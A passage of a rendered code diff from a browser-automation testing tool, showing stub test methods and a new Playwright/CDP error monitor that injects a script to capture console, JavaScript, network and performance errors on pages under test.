                            element_info={"viewport": viewport, "element_box": box},
                            recommendations=["Fix CSS media queries", "Adjust element sizing", "Test responsive design"]
                        )
                        break  # one report per viewport is enough
                except Exception:
                    # Detached or non-rendered element — skip it.
                    continue
    except Exception as e:
        logger.error(f"Responsive design test error: {e}")
|
| 503 |
+
|
| 504 |
+
async def _test_page_load_time(self, page: Page):
    """Reload the page and report a bug if the load exceeds the threshold.

    Bug fix: the previous version diffed two ``performance.now()`` readings
    taken before and after ``page.reload()``. ``performance.now()``'s time
    origin is reset by the navigation, so the difference was meaningless
    (typically near zero or negative). Wall-clock time measured on the
    Python side with a monotonic clock is immune to the reload.

    Args:
        page: the page under test; it is reloaded as part of the measurement.
    """
    import time  # local import: only this measurement needs it

    try:
        start = time.monotonic()
        await page.reload()
        await page.wait_for_load_state('networkidle')
        load_time = time.monotonic() - start  # seconds

        if load_time > self.performance_thresholds['page_load_time']:
            self._add_bug_report(
                title="Slow Page Load Time",
                severity=BugSeverity.MEDIUM,
                description=f"Page load time is {load_time:.2f}s, exceeds threshold of {self.performance_thresholds['page_load_time']}s",
                steps_to_reproduce=["Reload page", "Measure load time"],
                expected_behavior="Page should load quickly",
                actual_behavior=f"Page loads in {load_time:.2f}s",
                url=page.url,
                element_info={"load_time": load_time, "threshold": self.performance_thresholds['page_load_time']},
                recommendations=["Optimize images", "Minify CSS/JS", "Use CDN", "Enable compression"]
            )
    except Exception as e:
        logger.error(f"Page load time test error: {e}")
|
| 528 |
+
|
| 529 |
+
async def _check_for_errors(self, page: Page) -> bool:
    """Return True when the injected fagun error monitor has recorded errors.

    Relies on ``window.fagunErrorMonitor`` being present on the page; absent
    monitor (or a failing evaluate, e.g. mid-navigation) counts as "no errors".
    """
    try:
        errors = await page.evaluate("""
            () => {
                if (window.fagunErrorMonitor) {
                    return window.fagunErrorMonitor.getErrors();
                }
                return [];
            }
        """)
    except Exception:
        return False
    return len(errors) > 0
|
| 544 |
+
|
| 545 |
+
def _add_bug_report(self, title: str, severity: BugSeverity, description: str,
                    steps_to_reproduce: List[str], expected_behavior: str,
                    actual_behavior: str, url: str, element_info: Dict[str, Any],
                    recommendations: List[str]):
    """Record a new BugReport in ``self.bugs_found`` and log a one-line summary.

    All arguments are passed through to the BugReport constructor unchanged.
    """
    report_fields = dict(
        title=title,
        severity=severity,
        description=description,
        steps_to_reproduce=steps_to_reproduce,
        expected_behavior=expected_behavior,
        actual_behavior=actual_behavior,
        url=url,
        element_info=element_info,
        recommendations=recommendations,
    )
    self.bugs_found.append(BugReport(**report_fields))
    logger.info(f"🐛 Bug found: {title} ({severity.value})")
|
| 563 |
+
|
| 564 |
+
# Placeholder methods for other tests
# NOTE(review): every stub below is an intentional no-op that is already
# invoked by one of the _test_*_scenarios suites; flesh them out or remove
# the corresponding suite calls.
async def _back_forward_test(self, page: Page):
    """Test browser back/forward functionality. (TODO: not implemented yet.)"""
    pass

async def _refresh_test(self, page: Page):
    """Test page refresh functionality. (TODO: not implemented yet.)"""
    pass

async def _url_manipulation_test(self, page: Page):
    """Test URL manipulation. (TODO: not implemented yet.)"""
    pass

async def _test_invalid_form_data(self, form: Locator, page: Page):
    """Test form with invalid data. (TODO: not implemented yet.)"""
    pass

async def _test_large_form_data(self, form: Locator, page: Page):
    """Test form with large data. (TODO: not implemented yet.)"""
    pass

async def _test_special_characters(self, form: Locator, page: Page):
    """Test form with special characters. (TODO: not implemented yet.)"""
    pass

async def _test_accessibility(self, page: Page):
    """Test accessibility features. (TODO: not implemented yet.)"""
    pass

async def _test_hover_effects(self, page: Page):
    """Test hover effects. (TODO: not implemented yet.)"""
    pass

async def _test_clickable_areas(self, page: Page):
    """Test clickable areas. (TODO: not implemented yet.)"""
    pass

async def _test_scrolling_behavior(self, page: Page):
    """Test scrolling behavior. (TODO: not implemented yet.)"""
    pass

async def _test_resource_loading(self, page: Page):
    """Test resource loading performance. (TODO: not implemented yet.)"""
    pass

async def _test_memory_usage(self, page: Page):
    """Test memory usage. (TODO: not implemented yet.)"""
    pass

async def _test_network_performance(self, page: Page):
    """Test network performance. (TODO: not implemented yet.)"""
    pass

async def _test_csrf_vulnerabilities(self, page: Page):
    """Test CSRF vulnerabilities. (TODO: not implemented yet.)"""
    pass

async def _test_clickjacking(self, page: Page):
    """Test clickjacking vulnerabilities. (TODO: not implemented yet.)"""
    pass

async def _test_session_management(self, page: Page):
    """Test session management. (TODO: not implemented yet.)"""
    pass

async def _test_authentication(self, page: Page):
    """Test authentication. (TODO: not implemented yet.)"""
    pass
|
| 632 |
+
|
| 633 |
+
|
| 634 |
+
# Global enhanced testing engine
# Module-level singleton shared by all importers; constructed at import time.
enhanced_ai_testing_engine = EnhancedAITestingEngine()
|
src/utils/error_monitor.py
ADDED
|
@@ -0,0 +1,615 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Error Detection & Monitoring
|
| 3 |
+
======================================================================
|
| 4 |
+
|
| 5 |
+
Advanced error detection and monitoring system that catches all types of errors
|
| 6 |
+
during testing including console errors, JavaScript errors, network errors, DOM errors,
|
| 7 |
+
and performance issues.
|
| 8 |
+
|
| 9 |
+
Author: Mejbaur Bahar Fagun
|
| 10 |
+
Role: Software Engineer in Test
|
| 11 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
+
import asyncio
|
| 15 |
+
import json
|
| 16 |
+
import time
|
| 17 |
+
from typing import List, Dict, Any, Optional, Callable
|
| 18 |
+
from playwright.async_api import Page, BrowserContext, CDPSession
|
| 19 |
+
from dataclasses import dataclass, field
|
| 20 |
+
from datetime import datetime
|
| 21 |
+
import logging
|
| 22 |
+
|
| 23 |
+
logger = logging.getLogger(__name__)
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
@dataclass
class ErrorInfo:
    """Information about an error that occurred.

    One record per captured event, produced by the ErrorMonitor CDP handlers
    and by the injected in-page error hook.
    """
    error_type: str       # category label, e.g. 'javascript_error' — TODO confirm full set
    error_message: str    # human-readable message text
    error_stack: str      # stack trace when available (may be empty)
    timestamp: datetime   # when the error was recorded
    url: str              # page URL at the time of the error
    source: str  # 'console', 'javascript', 'network', 'dom', 'performance'
    severity: str  # 'low', 'medium', 'high', 'critical'
    context: Dict[str, Any] = field(default_factory=dict)  # extra event-specific details
|
| 37 |
+
|
| 38 |
+
|
| 39 |
+
class ErrorMonitor:
|
| 40 |
+
"""Advanced error monitoring system."""
|
| 41 |
+
|
| 42 |
+
def __init__(self):
    """Create an idle monitor; call start_monitoring() to attach it to a page."""
    # Aggregate of every error recorded, regardless of source.
    self.errors: List[ErrorInfo] = []
    # Per-source buckets, filled by the corresponding CDP handlers.
    self.console_errors: List[ErrorInfo] = []
    self.js_errors: List[ErrorInfo] = []
    self.network_errors: List[ErrorInfo] = []
    self.dom_errors: List[ErrorInfo] = []
    self.performance_issues: List[ErrorInfo] = []
    # CDP session handle; attached lazily in start_monitoring().
    self.cdp_session: Optional[CDPSession] = None
    self.monitoring_active = False
|
| 51 |
+
|
| 52 |
+
async def start_monitoring(self, page: Page) -> None:
    """Attach to *page* over CDP and wire up all error/performance listeners.

    Failures are logged rather than raised so monitoring never breaks a
    test run.
    """
    try:
        self.monitoring_active = True

        # CDP exposes Runtime/Network/DOM/Performance events that plain
        # Playwright listeners do not.
        self.cdp_session = await page.context.new_cdp_session(page)

        for setup in (
            self._setup_console_monitoring,
            self._setup_javascript_monitoring,
            self._setup_network_monitoring,
            self._setup_dom_monitoring,
            self._setup_performance_monitoring,
        ):
            await setup()

        # Install the in-page window.onerror / onunhandledrejection hooks.
        await self._inject_error_detection_script(page)

        logger.info("🔍 Error monitoring started successfully")

    except Exception as e:
        logger.error(f"Failed to start error monitoring: {e}")
|
| 82 |
+
|
| 83 |
+
async def stop_monitoring(self) -> None:
    """Stop monitoring and detach the CDP session, if one was attached."""
    self.monitoring_active = False
    session = self.cdp_session
    if session:
        try:
            await session.detach()
        except Exception as e:
            # Detach is best-effort; the browser may already be gone.
            logger.warning(f"Error detaching CDP session: {e}")
    logger.info("🛑 Error monitoring stopped")
|
| 92 |
+
|
| 93 |
+
async def _setup_console_monitoring(self) -> None:
    """Subscribe to console API calls and runtime exceptions via CDP."""
    session = self.cdp_session
    if not session:
        return

    try:
        # Both domains must be enabled before their events are delivered.
        await session.send("Runtime.enable")
        await session.send("Console.enable")

        session.on("Runtime.consoleAPICalled", self._handle_console_message)
        # NOTE(review): Runtime.exceptionThrown is also subscribed in
        # _setup_javascript_monitoring with a different handler, so every
        # exception is delivered to both — confirm the duplication is intended.
        session.on("Runtime.exceptionThrown", self._handle_runtime_exception)

    except Exception as e:
        logger.error(f"Failed to setup console monitoring: {e}")
|
| 109 |
+
|
| 110 |
+
async def _setup_javascript_monitoring(self) -> None:
    """Route uncaught JavaScript exceptions to the JS-error handler."""
    session = self.cdp_session
    if not session:
        return

    try:
        # Safe even if console setup already enabled the Runtime domain.
        await session.send("Runtime.enable")
        session.on("Runtime.exceptionThrown", self._handle_javascript_exception)

    except Exception as e:
        logger.error(f"Failed to setup JavaScript monitoring: {e}")
|
| 124 |
+
|
| 125 |
+
async def _setup_network_monitoring(self) -> None:
    """Subscribe to request, response, and failure events on the Network domain."""
    session = self.cdp_session
    if not session:
        return

    try:
        await session.send("Network.enable")

        handlers = {
            "Network.responseReceived": self._handle_network_response,
            "Network.loadingFailed": self._handle_network_failure,
            "Network.requestWillBeSent": self._handle_network_request,
        }
        for event, handler in handlers.items():
            session.on(event, handler)

    except Exception as e:
        logger.error(f"Failed to setup network monitoring: {e}")
|
| 141 |
+
|
| 142 |
+
async def _setup_dom_monitoring(self) -> None:
    """Watch for whole-document updates via the DOM domain."""
    session = self.cdp_session
    if not session:
        return

    try:
        await session.send("DOM.enable")
        session.on("DOM.documentUpdated", self._handle_dom_update)

    except Exception as e:
        logger.error(f"Failed to setup DOM monitoring: {e}")
|
| 156 |
+
|
| 157 |
+
async def _setup_performance_monitoring(self) -> None:
    """Collect runtime metric events from the Performance domain."""
    session = self.cdp_session
    if not session:
        return

    try:
        await session.send("Performance.enable")
        session.on("Performance.metrics", self._handle_performance_metrics)

    except Exception as e:
        logger.error(f"Failed to setup performance monitoring: {e}")
|
| 171 |
+
|
| 172 |
+
async def _inject_error_detection_script(self, page: Page) -> None:
    """Inject comprehensive error detection script into *page*.

    Installs a page init script (runs before any page JS) that wraps
    window.onerror, window.onunhandledrejection, console.error/warn,
    resource load errors, fetch, and XMLHttpRequest, plus a
    PerformanceObserver for slow entries. Every captured event is buffered
    in `window.fagunErrorMonitor.errors`, which `get_injected_errors`
    later reads back via page.evaluate.

    Args:
        page: Playwright page to instrument.
    """
    # NOTE: this is a JS source string — the // comments inside it are part
    # of the injected script, not Python comments.
    error_detection_script = """
    (function() {
        // Store original error handlers
        const originalError = window.onerror;
        const originalUnhandledRejection = window.onunhandledrejection;

        // Global error handler
        window.onerror = function(message, source, lineno, colno, error) {
            const errorInfo = {
                type: 'javascript_error',
                message: message,
                source: source,
                line: lineno,
                column: colno,
                stack: error ? error.stack : null,
                timestamp: new Date().toISOString(),
                url: window.location.href
            };

            // Send to monitoring system
            if (window.fagunErrorMonitor) {
                window.fagunErrorMonitor.reportError(errorInfo);
            }

            // Call original handler if it exists
            if (originalError) {
                return originalError.apply(this, arguments);
            }

            return false;
        };

        // Unhandled promise rejection handler
        window.onunhandledrejection = function(event) {
            const errorInfo = {
                type: 'unhandled_promise_rejection',
                message: event.reason ? event.reason.toString() : 'Unknown promise rejection',
                stack: event.reason && event.reason.stack ? event.reason.stack : null,
                timestamp: new Date().toISOString(),
                url: window.location.href
            };

            // Send to monitoring system
            if (window.fagunErrorMonitor) {
                window.fagunErrorMonitor.reportError(errorInfo);
            }

            // Call original handler if it exists
            if (originalUnhandledRejection) {
                return originalUnhandledRejection.apply(this, arguments);
            }
        };

        // Monitor console errors
        const originalConsoleError = console.error;
        console.error = function(...args) {
            const errorInfo = {
                type: 'console_error',
                message: args.join(' '),
                timestamp: new Date().toISOString(),
                url: window.location.href
            };

            // Send to monitoring system
            if (window.fagunErrorMonitor) {
                window.fagunErrorMonitor.reportError(errorInfo);
            }

            // Call original console.error
            return originalConsoleError.apply(this, args);
        };

        // Monitor console warnings
        const originalConsoleWarn = console.warn;
        console.warn = function(...args) {
            const errorInfo = {
                type: 'console_warning',
                message: args.join(' '),
                timestamp: new Date().toISOString(),
                url: window.location.href
            };

            // Send to monitoring system
            if (window.fagunErrorMonitor) {
                window.fagunErrorMonitor.reportError(errorInfo);
            }

            // Call original console.warn
            return originalConsoleWarn.apply(this, args);
        };

        // Monitor resource loading errors
        window.addEventListener('error', function(event) {
            if (event.target !== window) {
                const errorInfo = {
                    type: 'resource_error',
                    message: `Failed to load ${event.target.tagName}: ${event.target.src || event.target.href}`,
                    element: event.target.tagName,
                    source: event.target.src || event.target.href,
                    timestamp: new Date().toISOString(),
                    url: window.location.href
                };

                // Send to monitoring system
                if (window.fagunErrorMonitor) {
                    window.fagunErrorMonitor.reportError(errorInfo);
                }
            }
        }, true);

        // Monitor network errors
        const originalFetch = window.fetch;
        window.fetch = function(...args) {
            return originalFetch.apply(this, args).catch(error => {
                const errorInfo = {
                    type: 'fetch_error',
                    message: error.message,
                    url: args[0],
                    timestamp: new Date().toISOString(),
                    currentUrl: window.location.href
                };

                // Send to monitoring system
                if (window.fagunErrorMonitor) {
                    window.fagunErrorMonitor.reportError(errorInfo);
                }

                throw error;
            });
        };

        // Monitor XMLHttpRequest errors
        const originalXHROpen = XMLHttpRequest.prototype.open;
        XMLHttpRequest.prototype.open = function(method, url, ...args) {
            this._fagunUrl = url;
            return originalXHROpen.apply(this, [method, url, ...args]);
        };

        const originalXHRSend = XMLHttpRequest.prototype.send;
        XMLHttpRequest.prototype.send = function(...args) {
            this.addEventListener('error', function() {
                const errorInfo = {
                    type: 'xhr_error',
                    message: 'XMLHttpRequest failed',
                    url: this._fagunUrl,
                    timestamp: new Date().toISOString(),
                    currentUrl: window.location.href
                };

                // Send to monitoring system
                if (window.fagunErrorMonitor) {
                    window.fagunErrorMonitor.reportError(errorInfo);
                }
            });

            return originalXHRSend.apply(this, args);
        };

        // Monitor performance issues
        const observer = new PerformanceObserver((list) => {
            for (const entry of list.getEntries()) {
                if (entry.entryType === 'measure' && entry.duration > 1000) {
                    const errorInfo = {
                        type: 'performance_issue',
                        message: `Slow operation: ${entry.name} took ${entry.duration}ms`,
                        duration: entry.duration,
                        timestamp: new Date().toISOString(),
                        url: window.location.href
                    };

                    // Send to monitoring system
                    if (window.fagunErrorMonitor) {
                        window.fagunErrorMonitor.reportError(errorInfo);
                    }
                }
            }
        });

        observer.observe({ entryTypes: ['measure', 'navigation', 'resource'] });

        // Create error monitor object
        window.fagunErrorMonitor = {
            errors: [],
            reportError: function(errorInfo) {
                this.errors.push(errorInfo);
                console.log('Fagun Error Monitor:', errorInfo);
            },
            getErrors: function() {
                return this.errors;
            },
            clearErrors: function() {
                this.errors = [];
            }
        };

        console.log('Fagun Error Monitor initialized');
    })();
    """

    try:
        # add_init_script runs before any page script on every navigation.
        await page.add_init_script(error_detection_script)
        logger.info("🔍 Error detection script injected successfully")
    except Exception as e:
        logger.error(f"Failed to inject error detection script: {e}")
|
| 378 |
+
|
| 379 |
+
def _handle_console_message(self, event: Dict[str, Any]) -> None:
    """Record console error/warning events reported over CDP.

    Only events whose type is 'error' or 'warning' are recorded; the entry
    is appended to both `console_errors` and the aggregate `errors` list.

    Args:
        event: Raw CDP console event payload. The message text is read
            from ``event['args'][0]['value']`` when present — assumed
            Runtime.consoleAPICalled-style shape; TODO confirm against the
            CDP session wiring.
    """
    try:
        msg_type = event.get('type')
        if msg_type not in ('error', 'warning'):
            return

        # Extract the message defensively: 'args' may be absent, an empty
        # list, or hold non-dict entries. The original indexed
        # event.get('args', [{}])[0], which raised IndexError when 'args'
        # was present but empty.
        args = event.get('args') or []
        first = args[0] if args else {}
        if isinstance(first, dict):
            message = first.get('value', 'Unknown console message')
        else:
            message = 'Unknown console message'

        error_info = ErrorInfo(
            error_type=msg_type,
            error_message=message,
            error_stack='',
            timestamp=datetime.now(),
            url='',
            source='console',
            # Warnings are downgraded; console errors are treated as high.
            severity='medium' if msg_type == 'warning' else 'high',
            context={'console_event': event}
        )
        self.console_errors.append(error_info)
        self.errors.append(error_info)
        logger.warning(f"Console {msg_type}: {error_info.error_message}")
    except Exception as e:
        logger.error(f"Error handling console message: {e}")
|
| 398 |
+
|
| 399 |
+
def _handle_runtime_exception(self, event: Dict[str, Any]) -> None:
    """Record a CDP runtime exception event as a high-severity error.

    Args:
        event: CDP event payload carrying an ``exceptionDetails`` dict
            (Runtime.exceptionThrown shape).
    """
    try:
        exception_details = event.get('exceptionDetails', {})
        # Serialize the CDP call-frame list into a readable string so
        # error_stack is always a str, consistent with every other
        # ErrorInfo producer in this class (the original stored the raw
        # list of frame dicts here).
        call_frames = exception_details.get('stackTrace', {}).get('callFrames', [])
        stack_text = '\n'.join(
            f"{frame.get('functionName') or '<anonymous>'} "
            f"({frame.get('url', '')}:{frame.get('lineNumber', 0)}:{frame.get('columnNumber', 0)})"
            for frame in call_frames
        )
        error_info = ErrorInfo(
            error_type='runtime_exception',
            error_message=exception_details.get('text', 'Unknown runtime exception'),
            error_stack=stack_text,
            timestamp=datetime.now(),
            url='',
            source='javascript',
            severity='high',
            context={'exception_details': exception_details}
        )
        self.js_errors.append(error_info)
        self.errors.append(error_info)
        logger.error(f"Runtime exception: {error_info.error_message}")
    except Exception as e:
        logger.error(f"Error handling runtime exception: {e}")
|
| 418 |
+
|
| 419 |
+
def _handle_javascript_exception(self, event: Dict[str, Any]) -> None:
    """Record a JavaScript exception event as a high-severity error.

    Args:
        event: CDP event payload carrying an ``exceptionDetails`` dict.
    """
    try:
        exception_details = event.get('exceptionDetails', {})
        # Serialize the CDP call-frame list into a readable string so
        # error_stack is always a str, consistent with every other
        # ErrorInfo producer in this class (the original stored the raw
        # list of frame dicts here).
        call_frames = exception_details.get('stackTrace', {}).get('callFrames', [])
        stack_text = '\n'.join(
            f"{frame.get('functionName') or '<anonymous>'} "
            f"({frame.get('url', '')}:{frame.get('lineNumber', 0)}:{frame.get('columnNumber', 0)})"
            for frame in call_frames
        )
        error_info = ErrorInfo(
            error_type='javascript_exception',
            error_message=exception_details.get('text', 'Unknown JavaScript exception'),
            error_stack=stack_text,
            timestamp=datetime.now(),
            url='',
            source='javascript',
            severity='high',
            context={'exception_details': exception_details}
        )
        self.js_errors.append(error_info)
        self.errors.append(error_info)
        logger.error(f"JavaScript exception: {error_info.error_message}")
    except Exception as e:
        logger.error(f"Error handling JavaScript exception: {e}")
|
| 438 |
+
|
| 439 |
+
def _handle_network_response(self, event: Dict[str, Any]) -> None:
    """Record failed HTTP responses (status >= 400) seen over CDP.

    5xx responses are tagged 'high' severity, 4xx 'medium'; entries land in
    both `network_errors` and the aggregate `errors` list.
    """
    try:
        response = event.get('response', {})
        status = response.get('status', 0)

        # Successful / informational responses are ignored.
        if status < 400:
            return

        severity = 'high' if status >= 500 else 'medium'
        error_info = ErrorInfo(
            error_type='network_error',
            error_message=f"HTTP {status} error for {response.get('url', 'unknown URL')}",
            error_stack='',
            timestamp=datetime.now(),
            url=response.get('url', ''),
            source='network',
            severity=severity,
            context={'status': status, 'response': response}
        )
        self.network_errors.append(error_info)
        self.errors.append(error_info)
        logger.warning(f"Network error: {error_info.error_message}")
    except Exception as exc:
        logger.error(f"Error handling network response: {exc}")
|
| 461 |
+
|
| 462 |
+
def _handle_network_failure(self, event: Dict[str, Any]) -> None:
    """Record CDP network loading failures as high-severity errors."""
    try:
        failure_text = event.get('errorText', 'Unknown network failure')
        error_info = ErrorInfo(
            error_type='network_failure',
            error_message=f"Network failure: {failure_text}",
            error_stack='',
            timestamp=datetime.now(),
            # NOTE(review): the CDP requestId is stored in the url field
            # (the failure event carries no URL) — confirm downstream
            # consumers expect that.
            url=event.get('requestId', ''),
            source='network',
            severity='high',
            context={'failure_event': event}
        )
        self.network_errors.append(error_info)
        self.errors.append(error_info)
        logger.error(f"Network failure: {error_info.error_message}")
    except Exception as exc:
        logger.error(f"Error handling network failure: {exc}")
|
| 480 |
+
|
| 481 |
+
def _handle_network_request(self, event: Dict[str, Any]) -> None:
    """Trace each outgoing network request at debug level (nothing is recorded)."""
    try:
        req = event.get('request', {})
        method = req.get('method', 'GET')
        target = req.get('url', '')
        logger.debug(f"Network request: {method} {target}")
    except Exception as exc:
        logger.error(f"Error handling network request: {exc}")
|
| 489 |
+
|
| 490 |
+
def _handle_dom_update(self, event: Dict[str, Any]) -> None:
    """Placeholder hook for DOM document updates; currently only debug-logs."""
    try:
        logger.debug("DOM document updated")
    except Exception as exc:
        logger.error(f"Error handling DOM update: {exc}")
|
| 497 |
+
|
| 498 |
+
def _handle_performance_metrics(self, event: Dict[str, Any]) -> None:
    """Flag slow tasks reported via CDP performance metrics.

    A 'TaskDuration' metric above 1000ms is recorded as a medium-severity
    performance issue in both `performance_issues` and `errors`.
    """
    try:
        for metric in event.get('metrics', []):
            is_slow_task = (
                metric.get('name') == 'TaskDuration'
                and metric.get('value', 0) > 1000
            )
            if not is_slow_task:
                continue

            error_info = ErrorInfo(
                error_type='performance_issue',
                error_message=f"Slow task detected: {metric.get('value', 0)}ms",
                error_stack='',
                timestamp=datetime.now(),
                url='',
                source='performance',
                severity='medium',
                context={'metric': metric}
            )
            self.performance_issues.append(error_info)
            self.errors.append(error_info)
            logger.warning(f"Performance issue: {error_info.error_message}")
    except Exception as exc:
        logger.error(f"Error handling performance metrics: {exc}")
|
| 519 |
+
|
| 520 |
+
async def get_injected_errors(self, page: Page) -> List[ErrorInfo]:
    """Get errors from the injected error detection script.

    Reads ``window.fagunErrorMonitor.errors`` (populated by the script
    installed in ``_inject_error_detection_script``) and converts each raw
    JS record into an ErrorInfo.

    Args:
        page: Playwright page the detection script was injected into.

    Returns:
        List of ErrorInfo records; empty list on any failure.
    """
    try:
        errors = await page.evaluate("""
            () => {
                if (window.fagunErrorMonitor) {
                    return window.fagunErrorMonitor.getErrors();
                }
                return [];
            }
        """)

        error_infos = []
        for error in errors:
            # JS Date.toISOString() produces '...Z', which
            # datetime.fromisoformat() rejects before Python 3.11 —
            # normalize the suffix, and fall back to "now" if the
            # timestamp is still unparseable.
